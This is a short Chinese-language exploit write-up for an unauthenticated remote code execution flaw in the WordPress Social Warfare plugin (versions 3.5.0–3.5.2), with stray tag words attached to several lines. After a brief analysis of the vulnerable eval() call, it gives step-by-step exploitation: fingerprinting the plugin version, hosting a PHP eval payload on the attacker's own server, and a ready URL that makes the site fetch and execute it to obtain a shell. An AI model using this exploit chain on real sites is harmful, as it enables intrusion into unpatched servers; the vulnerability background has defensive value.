該漏洞只存在於Social Warfare插進的3.5.0、3.5.1和3.5.2版本中,其餘版本不存在。php
2019年3月21日插件做者緊急發佈了3.5.3版本以修復高危的RCE漏洞,在<=3.5.2版本中存在一處無需登陸便可getshell的RCE漏洞。shell
漏洞分析服務器
在/wp-content/plugins/social-warfare/lib/utilities/SWP_Database_Migration.php文件中有一處eval()函數,該函數將file_get_contents()讀取的文件內容當作PHP代碼執行致使RCE。函數
漏洞利用post
第一步:刺探是否安裝了Social Warfare插件url
訪問http://127.0.0.1/wp-content/plugins/social-warfare/readme.txt,若是存在readme.txt文件則說明已經安裝該插件,而且從該txt文件中可獲知插件的版本。spa
個人本機環境爲3.5.2版本。插件
第二步:在本身的VPS服務器上放置一個code.txt文件,並啓動HTTP服務使該文件可經過HTTP訪問。文件內容以下:debug
<pre>eval($_REQUEST['wpaa'])</pre>
第三步:在未登錄任何帳號的狀況下直接訪問以下連接便可getshell。code
http://127.0.0.1//wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://your_ip/code.txt&wpaa=phpinfo();